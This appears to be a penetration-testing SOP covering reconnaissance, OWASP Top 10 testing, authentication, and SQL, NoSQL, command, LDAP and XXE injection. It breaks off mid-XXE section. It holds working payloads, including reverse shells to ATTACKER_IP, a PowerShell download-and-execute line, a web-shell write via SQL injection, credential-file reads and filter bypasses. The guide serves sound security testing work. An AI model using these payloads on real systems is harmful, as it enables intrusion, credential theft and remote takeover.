Synced from an Obsidian vault

For graph and advanced features, download the full Intel Codex Vault and open it in Obsidian.

Web Application Security Testing SOP

Table of Contents

1. Overview
2. Quick Reference
3. Testing Environment Setup
4. Reconnaissance & Information Gathering
5. OWASP Top 10 Vulnerabilities
6. Authentication & Session Management
7. Injection Attacks
8. Cross-Site Scripting (XSS)
9. Cross-Site Request Forgery (CSRF)
10. Access Control & Authorization
11. API Security Testing
12. File Upload Vulnerabilities
13. Business Logic Testing
14. Client-Side Security
15. Server-Side Security
16. Automated Scanning
17. Reporting & Remediation
18. Tools Reference
19. Legal & Ethical Considerations

---

Overview

Purpose: Comprehensive guide for web application penetration testing, vulnerability assessment, and security auditing.

Scope:

• OWASP Top 10 vulnerability testing
• Authentication and authorization testing
• API security assessment
• Business logic vulnerability identification
• Automated and manual testing methodologies

Prerequisites:

• Understanding of HTTP/HTTPS protocols
• Basic knowledge of web technologies (HTML, JavaScript, SQL)
• Familiarity with proxy tools (Burp Suite, OWASP ZAP)
• Written authorization for testing target applications

---

Quick Reference

OWASP Top 10 (2021)

Rank	Vulnerability	Impact	Common Tools
A01	Broken Access Control	High	Burp Suite, AuthMatrix
A02	Cryptographic Failures	High	SSL Labs, testssl.sh
A03	Injection	Critical	sqlmap, Burp Intruder
A04	Insecure Design	Medium	Manual review
A05	Security Misconfiguration	Medium	Nikto, Nmap
A06	Vulnerable Components	High	Retire.js, Snyk
A07	Authentication Failures	Critical	Hydra, Burp Intruder
A08	Software & Data Integrity	High	Manual review
A09	Logging & Monitoring Failures	Low	Manual review
A10	Server-Side Request Forgery	High	Burp Collaborator

Critical Commands

# Quick subdomain enumeration
subfinder -d target.com | httprobe | tee alive_subdomains.txt

# Fast port scan
nmap -p- --min-rate 10000 target.com

# SQL injection test
sqlmap -u "http://target.com/page?id=1" --batch --risk=3 --level=5

# XSS scanning
dalfox url http://target.com/search?q=test

# Directory brute-force
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SSL/TLS testing
testssl.sh --full target.com

---

Testing Environment Setup

Kali Linux / ParrotOS (Recommended)

Install essential tools:

# Update system
sudo apt update && sudo apt upgrade -y

# Install core web testing tools
sudo apt install -y \
    burpsuite \
    zaproxy \
    sqlmap \
    nikto \
    dirb \
    gobuster \
    wfuzz \
    ffuf \
    nmap \
    masscan \
    subfinder \
    amass \
    httprobe \
    nuclei \
    chromium \
    firefox-esr

# Install additional tools via Go
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/tomnomnom/waybackurls@latest
go install github.com/lc/gau/v2/cmd/gau@latest
go install github.com/hahwul/dalfox/v2@latest

# Install Burp Suite extensions
# Extensions to install manually in Burp:
# - Autorize (authorization testing)
# - AuthMatrix (role-based access control)
# - Turbo Intruder (fast brute-forcing)
# - JSON Web Tokens (JWT analysis)
# - Active Scan++ (enhanced scanning)

Windows Setup

# Install Chocolatey (package manager)
Set-ExecutionPolicy Bypass -Scope Process -Force
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))

# Install tools
choco install -y burp-suite-free-edition
choco install -y zaproxy
choco install -y nmap
choco install -y python
choco install -y golang

# Install Python-based tools
pip install sqlmap
pip install dirsearch
pip install wfuzz
pip install arjun  # HTTP parameter discovery

macOS Setup

# Install Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install tools
brew install --cask burp-suite
brew install nmap
brew install gobuster
brew install ffuf
brew install python
brew install go

# Install Python tools
pip3 install sqlmap
pip3 install dirsearch
pip3 install arjun

Browser Configuration

Firefox for web testing:

# Install Firefox extensions:
# 1. FoxyProxy (proxy switching)
# 2. Wappalyzer (technology detection)
# 3. Cookie-Editor (cookie manipulation)
# 4. User-Agent Switcher (UA spoofing)

# Firefox about:config tweaks for testing:
# network.proxy.allow_hijacking_localhost → true
# security.fileuri.strict_origin_policy → false
# network.http.referer.XOriginPolicy → 0

Chrome/Chromium for web testing:

# Launch Chrome with disabled security (TESTING ONLY):
# Linux:
chromium --disable-web-security --user-data-dir=/tmp/chrome_dev --proxy-server=127.0.0.1:8080

# Windows:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-web-security --user-data-dir=C:\Temp\chrome_dev --proxy-server=127.0.0.1:8080

# macOS:
open -na "Google Chrome" --args --disable-web-security --user-data-dir=/tmp/chrome_dev --proxy-server=127.0.0.1:8080

Burp Suite Configuration

Launch Burp Suite:

# Linux:
java -jar -Xmx4g /usr/share/burpsuite/burpsuite.jar

# Windows:
# Use desktop shortcut or:
"C:\Program Files\BurpSuiteCommunity\BurpSuiteCommunity.exe"

# macOS:
open /Applications/Burp\ Suite\ Community\ Edition.app

Proxy configuration (default: 127.0.0.1:8080):

1. Burp → Proxy → Options → Add proxy listener
2. Import Burp CA certificate:

# Firefox: Preferences → Privacy & Security → Certificates → View Certificates → Import
# Download from: http://burp/cert (when Burp proxy is running)

# Linux system-wide:
sudo cp burp_ca.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates

# Windows system-wide:
# certutil -addstore -f "ROOT" burp_ca.crt

# macOS system-wide:
sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain burp_ca.crt

---

Reconnaissance & Information Gathering

Subdomain Enumeration

Passive enumeration (no direct target interaction):

# Subfinder (multiple sources: VirusTotal, CertSpotter, etc.)
subfinder -d target.com -o subdomains.txt

# Amass (comprehensive, slower)
amass enum -passive -d target.com -o amass_subdomains.txt

# Certificate Transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u

# Wayback Machine URLs
waybackurls target.com | tee wayback_urls.txt

# Common Crawl + Alien Vault
gau target.com | tee gau_urls.txt

Active enumeration (sends DNS queries to target):

# DNS brute-force with fierce
fierce --domain target.com --subdomains /usr/share/wordlists/subdomains.txt

# Gobuster DNS mode
gobuster dns -d target.com -w /usr/share/wordlists/subdomains-top1million-110000.txt -o gobuster_dns.txt

# Check which subdomains are alive
cat subdomains.txt | httprobe | tee alive_subdomains.txt

# Httpx for web server detection
cat alive_subdomains.txt | httpx -title -tech-detect -status-code -o httpx_results.txt

Port Scanning & Service Enumeration

# Fast SYN scan (requires root)
sudo nmap -sS -p- --min-rate 10000 target.com -oN nmap_fast.txt

# Service version detection
nmap -sV -p 80,443,8080,8443 target.com -oN nmap_services.txt

# Comprehensive scan with scripts
nmap -sC -sV -A -p- target.com -oN nmap_full.txt

# HTTP methods enumeration
nmap --script http-methods target.com -p 80,443,8080

# SSL/TLS vulnerability scanning
nmap --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed target.com -p 443

Technology Stack Detection

# Whatweb (command-line)
whatweb -v -a 3 http://target.com

# Wappalyzer (browser extension)
# Install from: https://www.wappalyzer.com/

# HTTP headers analysis
curl -I http://target.com

# Example output:
# Server: nginx/1.18.0
# X-Powered-By: PHP/7.4.3
# Set-Cookie: PHPSESSID=abc123

# Detect CMS
# WordPress:
curl -s http://target.com/wp-admin/ | grep "WordPress"

# Drupal:
curl -s http://target.com/CHANGELOG.txt | head -1

# Joomla:
curl -s http://target.com/administrator/ | grep "Joomla"

Directory & File Discovery

# Ffuf (fast, recommended)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302,403 -o ffuf_dirs.json

# Gobuster (directory mode)
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak -o gobuster_dirs.txt

# Dirsearch (Python-based)
dirsearch -u http://target.com -e php,html,js,txt -x 404,403 --format plain -o dirsearch_results.txt

# Feroxbuster (recursive scanning)
feroxbuster -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --depth 4

# Custom wordlist for API endpoints
ffuf -u http://target.com/api/FUZZ -w api_endpoints.txt -mc 200,201,401,403

# Example api_endpoints.txt:
# v1/users
# v1/auth/login
# v2/products
# admin/config
# graphql

Parameter Discovery

# Arjun (parameter discovery)
arjun -u http://target.com/search

# Example output:
# [+] Found parameters: q, page, sort, filter

# ParamSpider (extract parameters from Wayback Machine)
python3 paramspider.py --domain target.com --output params.txt

# Test parameters for reflection
cat params.txt | while read param; do
    curl -s "http://target.com/search?${param}=FUZZ_XSS" | grep "FUZZ_XSS" && echo "[+] Reflected: $param"
done

JavaScript Analysis

# Download all JavaScript files
wget -r -l1 -H -t1 -nd -N -np -A.js -erobots=off http://target.com

# Extract endpoints from JS files
cat *.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u

# Find API keys in JS
cat *.js | grep -Eo "api[_-]?key['\"]?\s*[:=]\s*['\"]?[a-zA-Z0-9_-]{20,}"

# LinkFinder (extract endpoints from JS)
python3 linkfinder.py -i http://target.com/app.js -o endpoints.html

# Retire.js (vulnerable JavaScript library detection)
retire --js --jspath http://target.com

---

OWASP Top 10 Vulnerabilities

A01:2021 - Broken Access Control

Concept: Users can access resources or perform actions they shouldn't be authorized for.

Common vulnerabilities:

• Insecure Direct Object Reference (IDOR)
• Path traversal
• Missing function-level access control
• Horizontal/vertical privilege escalation

Testing methodology:

# 1. IDOR testing - Modify user IDs
# Original request:
GET /api/user/123/profile HTTP/1.1
Cookie: session=user123_session

# Modified request (try accessing user 124):
GET /api/user/124/profile HTTP/1.1
Cookie: session=user123_session

# Expected: 403 Forbidden or 401 Unauthorized
# Vulnerable: 200 OK with user 124's data

Burp Suite - Autorize extension workflow:

1. Install Autorize extension
2. Configure low-privilege user session token
3. Browse application as high-privilege user
4. Autorize automatically replays requests with low-privilege token
5. Review results for unauthorized access

Path traversal testing:

# Directory traversal payloads
curl "http://target.com/download?file=../../../../etc/passwd"
curl "http://target.com/download?file=..%2f..%2f..%2f..%2fetc%2fpasswd"
curl "http://target.com/download?file=....//....//....//etc/passwd"

# Windows paths
curl "http://target.com/download?file=..\..\..\..\windows\system32\drivers\etc\hosts"

# Null byte injection (older PHP versions)
curl "http://target.com/download?file=../../../../etc/passwd%00.jpg"

Horizontal privilege escalation:

# User A's account:
GET /account/settings HTTP/1.1
Cookie: session=userA_session

POST /account/update HTTP/1.1
Cookie: session=userA_session
Content-Type: application/x-www-form-urlencoded

user_id=123&email=newmail@example.com

# Attempt to modify user B's account:
POST /account/update HTTP/1.1
Cookie: session=userA_session
Content-Type: application/x-www-form-urlencoded

user_id=124&email=attacker@example.com  # Try to modify user 124's email

Vertical privilege escalation:

# Standard user attempting admin action:
GET /admin/users HTTP/1.1
Cookie: session=standard_user_session

# Check for parameter pollution:
GET /admin/users?role=admin HTTP/1.1
Cookie: session=standard_user_session

# Mass assignment vulnerability:
POST /api/user/update HTTP/1.1
Cookie: session=standard_user_session
Content-Type: application/json

{
    "email": "user@example.com",
    "is_admin": true  # Try to elevate privileges
}

A02:2021 - Cryptographic Failures

Concept: Sensitive data exposed due to weak or missing encryption.

Common issues:

• Unencrypted data transmission (HTTP instead of HTTPS)
• Weak encryption algorithms (MD5, SHA1, DES)
• Hardcoded encryption keys
• Predictable tokens

SSL/TLS testing:

# testssl.sh (comprehensive SSL/TLS testing)
testssl.sh --full https://target.com

# Check for specific vulnerabilities:
testssl.sh --heartbleed --ccs-injection --ticketbleed https://target.com

# SSL Labs online scanner:
# https://www.ssllabs.com/ssltest/analyze.html?d=target.com

# Nmap SSL scripts
nmap --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle -p 443 target.com

# Check for weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com | grep -E "weak|broken|deprecated"

Weak hashing detection:

# Analyze password hashes from database dump
hashid '$1$abc123$xyz789'  # Identifies hash type

# Example vulnerable hashes:
# MD5: 5d41402abc4b2a76b9719d911017c592 (weak)
# SHA1: 356a192b7913b04c54574d18c28d46e6395428ab (weak)
# bcrypt: $2y$10$... (strong)

# Check for plaintext passwords in HTTP traffic (Wireshark)
tshark -r capture.pcap -Y "http.request.method == POST" -T fields -e http.file_data | grep -i "password="

Insecure randomness:

# Vulnerable token generation (predictable)
import random
token = random.randint(100000, 999999)  # NOT cryptographically secure

# Secure token generation
import secrets
token = secrets.token_urlsafe(32)  # Cryptographically secure

A03:2021 - Injection

See detailed section: Injection Attacks

A04:2021 - Insecure Design

Concept: Fundamental flaws in application architecture and business logic.

Common issues:

• Missing rate limiting
• No account lockout after failed login attempts
• Insufficient workflow validation
• Trust boundary violations

Testing methodology:

# Rate limiting test
for i in {1..1000}; do
    curl -X POST http://target.com/api/login \
        -d "username=admin&password=wrong$i" &
done
# Expected: 429 Too Many Requests after ~10 attempts
# Vulnerable: Unlimited attempts allowed

# Account enumeration
curl -X POST http://target.com/api/login -d "username=existinguser&password=wrong"
# Response: "Invalid password" (user exists)

curl -X POST http://target.com/api/login -d "username=nonexistent&password=wrong"
# Response: "User not found" (enumeration possible)

# Secure response: "Invalid username or password" (same for both cases)

A05:2021 - Security Misconfiguration

Common issues:

• Default credentials
• Directory listing enabled
• Verbose error messages
• Unnecessary services enabled
• Missing security headers

Testing:

# Check for default credentials
# Common defaults:
# admin:admin
# admin:password
# root:root
# admin:123456

# Directory listing test
curl http://target.com/uploads/
# Vulnerable output:
# <html><head><title>Index of /uploads/</title></head>

# Verbose error messages
curl http://target.com/nonexistent.php
# Vulnerable output:
# Fatal error: include(config.php): failed to open stream: No such file in /var/www/html/index.php on line 5

# Check security headers
curl -I http://target.com

# Missing headers (vulnerable):
# ❌ X-Frame-Options
# ❌ X-Content-Type-Options
# ❌ Strict-Transport-Security
# ❌ Content-Security-Policy

# Secure headers:
# ✅ X-Frame-Options: DENY
# ✅ X-Content-Type-Options: nosniff
# ✅ Strict-Transport-Security: max-age=31536000; includeSubDomains
# ✅ Content-Security-Policy: default-src 'self'

Nikto automated scanner:

nikto -h http://target.com -o nikto_report.html -Format html

# Common findings:
# - Server version disclosure
# - Missing security headers
# - Default files present
# - SSL/TLS issues

A06:2021 - Vulnerable and Outdated Components

Detection:

# Retire.js (JavaScript libraries)
retire --js --jspath http://target.com

# Snyk (dependency scanning)
snyk test

# OWASP Dependency-Check
dependency-check --project "MyApp" --scan /path/to/project

# Check WordPress plugins/themes
wpscan --url http://target.com --enumerate vp,vt --api-token YOUR_TOKEN

# Check Drupal modules
droopescan scan drupal -u http://target.com

# Manual version detection
curl -s http://target.com/js/jquery.js | grep "jQuery v"
# Output: jQuery v1.8.2 (vulnerable to CVE-2015-9251)

A07:2021 - Identification and Authentication Failures

See detailed section: Authentication & Session Management

A08:2021 - Software and Data Integrity Failures

Concept: Code or infrastructure updates without integrity verification.

Testing:

# Check for Subresource Integrity (SRI)
curl -s http://target.com | grep "<script" | grep -v "integrity="
# Vulnerable: External scripts without SRI

# Secure example:
# <script src="https://cdn.example.com/lib.js"
#         integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
#         crossorigin="anonymous"></script>

# Insecure deserialization test (PHP)
# Payload: O:8:"stdClass":1:{s:4:"exec";s:10:"phpinfo();";}
echo 'TzoxMDoiRXZpbENsYXNzIjoxOntzOjQ6ImNtZCI7czoxMDoicGhwaW5mbygpOyI7fQ==' | base64 -d

# Test for serialized object injection
curl -X POST http://target.com/profile \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "data=O:4:\"User\":1:{s:5:\"admin\";b:1;}"

A09:2021 - Security Logging and Monitoring Failures

Testing approach:

# Test if failed login attempts are logged
# Perform 10 failed login attempts
for i in {1..10}; do
    curl -X POST http://target.com/login -d "username=admin&password=wrong$i"
done

# Check if account was locked (good)
# Check if you received notification email (good)
# No response difference = vulnerable

# Test if admin actions are logged
# Change user role, delete data, etc.
# Request audit logs via support/legal team

A10:2021 - Server-Side Request Forgery (SSRF)

Concept: Attacker tricks server into making requests to unintended locations.

Testing methodology:

# Basic SSRF test
curl "http://target.com/fetch?url=http://127.0.0.1:22"
# Vulnerable response: SSH banner

curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
# Vulnerable: AWS metadata exposed

# Common SSRF parameters:
# url=, uri=, path=, dest=, redirect=, next=, data=, reference=, site=, html=

# Bypass filters:
# http://127.0.0.1 → http://127.1 → http://0x7f.0x0.0x0.0x1
# http://localhost → http://localtest.me → http://spoofed.burpcollaborator.net

# Burp Collaborator for out-of-band detection
# 1. Burp → Burp Collaborator client → Copy to clipboard
# 2. Test payload:
curl "http://target.com/fetch?url=http://abc123.burpcollaborator.net"
# 3. Check Collaborator for HTTP request

Cloud metadata SSRF:

# AWS metadata
curl "http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Google Cloud metadata
curl "http://target.com/proxy?url=http://metadata.google.internal/computeMetadata/v1/"

# Azure metadata
curl "http://target.com/proxy?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01" -H "Metadata:true"

---

Authentication & Session Management

Password Brute-Forcing

Hydra (multi-protocol brute-force):

# HTTP POST form brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

# Explanation:
# -l admin: Username is "admin"
# -P rockyou.txt: Password wordlist
# http-post-form: Protocol
# /login: Target path
# username=^USER^&password=^PASS^: POST parameters
# F=incorrect: Failure string in response

# HTTP Basic Auth
hydra -l admin -P passwords.txt target.com http-get /admin/

# SSH brute-force
hydra -l root -P passwords.txt ssh://target.com

# FTP brute-force
hydra -l admin -P passwords.txt ftp://target.com

Burp Suite Intruder:

1. Capture login request in Burp Proxy
2. Right-click → Send to Intruder
3. Positions tab: Mark password parameter

   username=admin&password=§FUZZ§

4. Payloads tab: Load password list
5. Options tab: Grep - Match for success indicators
6. Start attack

Detecting weak passwords:

# Common credentials test
curl -X POST http://target.com/api/login \
    -H "Content-Type: application/json" \
    -d '{"username":"admin","password":"admin"}'

# Top 25 most common passwords:
# 123456, password, 12345678, qwerty, 123456789, 12345, 1234, 111111, 1234567, dragon, 123123, baseball, abc123, football, monkey, letmein, shadow, master, 666666, qwertyuiop, 123321, mustang, 1234567890, michael, 654321

Session Management Testing

Session token analysis:

# Capture multiple session tokens
for i in {1..50}; do
    curl -s -c cookies$i.txt http://target.com/login \
        -d "username=user$i&password=password$i"
    grep "session" cookies$i.txt >> all_sessions.txt
done

# Analyze tokens for patterns
cat all_sessions.txt
# Vulnerable examples:
# session=user1_1234567890  (predictable)
# session=MTIzNDU2Nzg5MA== (base64 of timestamp)
# session=md5(username)     (weak)

# Secure example:
# session=7c3a8f9b2e1d4a6c9f8e7b3a2d1c0f9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a (random, 256-bit)

Session fixation test:

# 1. Attacker obtains session ID before login
curl -s -c cookies.txt http://target.com
# Set-Cookie: PHPSESSID=abc123

# 2. Send link to victim with fixed session ID
# http://target.com/?PHPSESSID=abc123

# 3. Victim logs in using fixed session ID

# 4. Attacker uses same session ID to access victim's account
curl -b "PHPSESSID=abc123" http://target.com/dashboard

# Expected (secure): New session ID generated after login
# Vulnerable: Same session ID persists after authentication

Session timeout testing:

# 1. Login and capture session token
SESSION="7c3a8f9b2e1d4a6c9f8e7b3a2d1c0f9e"

# 2. Wait 30 minutes (or configured timeout)
sleep 1800

# 3. Attempt to access protected resource
curl -b "session=$SESSION" http://target.com/admin/dashboard

# Expected: 401 Unauthorized or redirect to login
# Vulnerable: 200 OK (session never expires)

Logout functionality:

# 1. Login and capture session
curl -s -c cookies.txt http://target.com/login -d "username=test&password=test123"
SESSION=$(grep "session" cookies.txt | awk '{print $7}')

# 2. Logout
curl -b "session=$SESSION" http://target.com/logout

# 3. Try to reuse session
curl -b "session=$SESSION" http://target.com/dashboard

# Expected: 401 Unauthorized (session invalidated)
# Vulnerable: 200 OK (session still valid after logout)

Multi-Factor Authentication (MFA) Bypass

Common bypass techniques:

# 1. Direct endpoint access (skip MFA page)
# Normal flow:
# /login → /mfa-verify → /dashboard

# Bypass attempt:
curl -b "session=partial_auth_session" http://target.com/dashboard
# Vulnerable if dashboard accessible without MFA

# 2. Response manipulation
# Capture MFA verification response:
POST /mfa-verify HTTP/1.1
Content-Type: application/json

{"code": "000000"}

# Response:
{"success": false, "mfa_valid": false}

# Modify response to:
{"success": true, "mfa_valid": true}

# 3. Rate limiting bypass
# Test unlimited MFA code attempts:
for code in {000000..999999}; do
    curl -X POST http://target.com/mfa-verify \
        -b "session=xyz" \
        -d "code=$code" &
done

# 4. Backup codes enumeration
curl -X POST http://target.com/mfa-verify -d "backup_code=00000000"
curl -X POST http://target.com/mfa-verify -d "backup_code=00000001"
# Should have rate limiting

JWT (JSON Web Token) Testing

JWT structure:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Part 1 (Header):    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Part 2 (Payload):   eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
Part 3 (Signature): SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Decode JWT:

# Decode using jwt_tool
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

# Manual decode (base64)
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# Output: {"alg":"HS256","typ":"JWT"}

echo "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ" | base64 -d
# Output: {"sub":"1234567890","name":"John Doe","iat":1516239022}

Common JWT vulnerabilities:

# 1. Algorithm confusion (HS256 → None)
# Original header:
{"alg":"HS256","typ":"JWT"}

# Modified header:
{"alg":"none","typ":"JWT"}

# Modified token (no signature):
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0IiwibmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOnRydWV9.

# 2. Algorithm confusion (RS256 → HS256)
# Server expects RS256 (asymmetric)
# Send HS256 (symmetric) signed with public key

# 3. Weak secret brute-force
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

# 4. Modify claims
# Original:
{"sub":"1234","name":"user","is_admin":false}

# Modified:
{"sub":"1234","name":"user","is_admin":true}

# Re-sign with cracked/weak secret

jwt_tool automated testing:

# All vulnerability scans
python3 jwt_tool.py <JWT> -M at -t "http://target.com/api/data"

# Specific tests:
# -X a : Algorithm confusion
# -X i : Inject new claims
# -X s : JWKS spoofing

---

Injection Attacks

SQL Injection

Detection (manual):

# 1. Single quote test
curl "http://target.com/product?id=1'"
# Error message indicates SQLi vulnerability:
# "You have an error in your SQL syntax..."

# 2. Boolean-based test
curl "http://target.com/product?id=1 AND 1=1"  # Should work normally
curl "http://target.com/product?id=1 AND 1=2"  # Should return different result

# 3. Time-based blind SQLi
curl "http://target.com/product?id=1 AND SLEEP(5)"
# If response takes 5+ seconds = vulnerable

# 4. Union-based SQLi
curl "http://target.com/product?id=1 UNION SELECT NULL,NULL,NULL--"
# Adjust number of NULLs until no error

curl "http://target.com/product?id=1 UNION SELECT 1,2,3--"
# Numbers appear in response = injection point

curl "http://target.com/product?id=1 UNION SELECT 1,database(),user()--"
# Extract database name and current user

sqlmap (automated SQLi exploitation):

# Basic scan
sqlmap -u "http://target.com/product?id=1"

# Specify parameter to test
sqlmap -u "http://target.com/search" --data "q=test" -p q

# Cookie-based SQLi
sqlmap -u "http://target.com/dashboard" --cookie="session=abc123" --level=2

# POST request with SQLi
sqlmap -u "http://target.com/login" --data="username=admin&password=test" -p username

# Aggressive testing (risk=3, level=5)
sqlmap -u "http://target.com/product?id=1" --risk=3 --level=5 --batch

# Extract database names
sqlmap -u "http://target.com/product?id=1" --dbs

# Extract tables from specific database
sqlmap -u "http://target.com/product?id=1" -D webapp --tables

# Extract columns from specific table
sqlmap -u "http://target.com/product?id=1" -D webapp -T users --columns

# Dump table data
sqlmap -u "http://target.com/product?id=1" -D webapp -T users --dump

# Full database dump
sqlmap -u "http://target.com/product?id=1" --dump-all --batch

# OS shell (if database user has FILE privileges)
sqlmap -u "http://target.com/product?id=1" --os-shell

# Read file from server
sqlmap -u "http://target.com/product?id=1" --file-read="/etc/passwd"

# Write file to server
sqlmap -u "http://target.com/product?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

Manual exploitation examples:

-- MySQL injection payloads:

-- Enumerate databases
1' UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Enumerate tables
1' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='webapp'--

-- Enumerate columns
1' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--

-- Extract data
1' UNION SELECT 1,CONCAT(username,':',password),3 FROM users--

-- Read file (requires FILE privilege)
1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3--

-- Write file (requires FILE privilege)
1' UNION SELECT 1,'<?php system($_GET["cmd"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php'--

-- PostgreSQL specific:
1'; SELECT version()--
1'; SELECT current_database()--

-- MSSQL specific:
1'; SELECT @@version--
1'; EXEC xp_cmdshell 'whoami'--

-- Oracle specific:
1' UNION SELECT NULL,banner,NULL FROM v$version--

Bypass WAF/filters:

# URL encoding
id=1%27%20OR%201=1--

# Double URL encoding
id=1%2527%2520OR%25201=1--

# Case variation
id=1' Or 1=1--
id=1' oR 1=1--

# Comment injection
id=1'/**/OR/**/1=1--

# Whitespace variations
id=1' OR 1=1--
id=1'OR'1'='1
id=1'%09OR%091=1--  (tab character)

# Inline comments
id=1'/*!OR*/1=1--
id=1'/*! OR */1=1--

# String concatenation
id=1' OR 'a'='a
id=CHAR(49) OR 1=1--

NoSQL Injection

MongoDB injection:

# Authentication bypass
curl -X POST http://target.com/login \
    -H "Content-Type: application/json" \
    -d '{"username":{"$ne":null},"password":{"$ne":null}}'

# $ne = not equal (bypasses authentication)

# Extract data using regex
curl -X POST http://target.com/login \
    -d "username[$regex]=^admin&password[$ne]=null"

# Boolean-based enumeration
curl -X POST http://target.com/login \
    -d "username=admin&password[$regex]=^a"  # Check if password starts with 'a'

# JavaScript injection
curl -X POST http://target.com/search \
    -d "query='; return true; var dummy='"

Testing methodology:

# 1. Test for NoSQL injection in login
{"username":"admin","password":{"$gt":""}}  # $gt = greater than (always true)

# 2. Test in search functionality
{"search":{"$where":"this.name == 'test'"}}

# 3. Test in user enumeration
{"username":{"$regex":"^admin"},"password":"anything"}

Command Injection (OS Command Injection)

Detection:

# Test for command injection with sleep
curl "http://target.com/ping?host=127.0.0.1; sleep 10"
# If response takes 10+ seconds = vulnerable

# Test for command injection with output
curl "http://target.com/ping?host=127.0.0.1; whoami"
# If response contains username = vulnerable

Common injection points:

# Ping utility
host=127.0.0.1; cat /etc/passwd
host=127.0.0.1 | whoami
host=127.0.0.1 && id
host=`whoami`
host=$(whoami)

# File operations
filename=test.txt; cat /etc/passwd
filename=test.txt | ls -la

# ImageMagick convert
convert=input.jpg; cat /etc/passwd; output.png

Exploitation payloads:

# Linux command injection:
; cat /etc/passwd
; cat /etc/shadow
; cat ~/.ssh/id_rsa
; ls -la /var/www/html
; uname -a
; whoami
; id
; pwd

# Reverse shell (Linux)
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; nc ATTACKER_IP 4444 -e /bin/bash
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Windows command injection:
; whoami
; ipconfig
; type C:\Windows\win.ini
; net user
; net localgroup administrators

# Windows reverse shell
; powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

Bypass filters:

# Whitespace filtering bypass
cat</etc/passwd
cat<>file
{cat,/etc/passwd}

# Blacklist bypass
c''at /etc/passwd
c\at /etc/passwd
c$@at /etc/passwd

# Use wildcards
cat /etc/pass??
cat /etc/*ss*d

# Encoding bypass
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash  # base64 decode "cat /etc/passwd"

LDAP Injection

Authentication bypass:

# Normal LDAP query:
(&(uid=username)(password=userpass))

# Injection payload:
username: admin)(&)
password: anything

# Resulting query:
(&(uid=admin)(&))(password=anything))
# Always returns admin user

LDAP injection payloads:

# Authentication bypass
*
*)(&
*)(uid=*)(&
admin)(&

# Extract data
*)(uid=*))%00
*)(|(uid=*

# Blind LDAP injection
admin)(&(objectClass=*
admin)(&(uid=a*

XML External Entity (XXE) Injection

Basic XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <username>&xxe;</username>
</data>

Testing methodology:

# 1. Submit XML with entity reference
curl -X POST http://target.com/api/upload \
    -H "Content-Type: application/xml" \
    -d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data><username>&xxe;</username></data>'

# 2. Check response for /etc/passwd content

